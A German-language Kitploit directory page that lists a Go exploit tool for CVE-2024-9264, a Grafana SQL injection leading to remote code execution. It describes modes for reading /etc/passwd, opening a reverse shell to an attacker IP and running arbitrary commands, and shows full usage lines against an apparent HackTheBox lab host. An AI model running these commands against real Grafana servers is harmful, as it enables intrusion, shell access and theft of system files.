Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9264 — Eine Go-Implementierung für CVE-2024-9264, die Grafana-Versionen 11.0.x, 11.1.x und 11.2.x betrifft. | Kitploit
Tools/GitHubGitHub/cythonic1/cve-2024-9264
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

Eine Go-Implementierung für CVE-2024-9264, die Grafana-Versionen 11.0.x, 11.1.x und 11.2.x betrifft.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

🚨 CVE-2024-9264 - Grafana SQL-Injection, die zu Remote Code Execution (RCE) und Datei-Lesen führt

Exploit-Tool für CVE-2024-9264, eine kritische Schwachstelle in Grafana, die es authentifizierten Angreifern ermöglicht, SQL-Abfragen auszuführen, was zu RCE führt

🛡️ Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt.
Unautorisierte Nutzung ist illegal und unethisch.


🧠 Überblick über die Schwachstelle

🕳️ Was ist CVE-2024-9264?

CVE-2024-9264 ist ein kritischer Fehler in Grafana, der es authentifizierten Angreifern ermöglicht, SQL-Befehle auszuführen, was zu RCE und Datei-Lesen führt.

🧬 Grundursache

  • Unzureichende Bereinigung (Sanitization).

💥 Auswirkungen

  • RCE: Beliebige Befehle ausführen, Reverse Shells erhalten oder sensible Dateien lesen.
  • Hoher Schweregrad: Vollständige Serverübernahme möglich, wenn erfolgreich.

⚒️ Funktionen

  • Unterstützt mehrere Angriffsmodi:
    • file – Beliebige Dateien lesen (z. B. /etc/passwd)
    • shell – Reverse Shell zum Angreifer-Rechner
    • command – Beliebige Shell-Befehle ausführen (z. B. whoami)
  • Anpassbare Angreifer-IP, Port und Anmeldedaten

🚀 Verwendung

Hilfemenü

Nicht alle Argumente sind erforderlich.

Beispiele

Shell erhalten

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

Dateien lesen

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

Einzelnen Befehl ausführen

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 Befehlszeilen-Flags

go run main.go [flags]

Tool herunterladen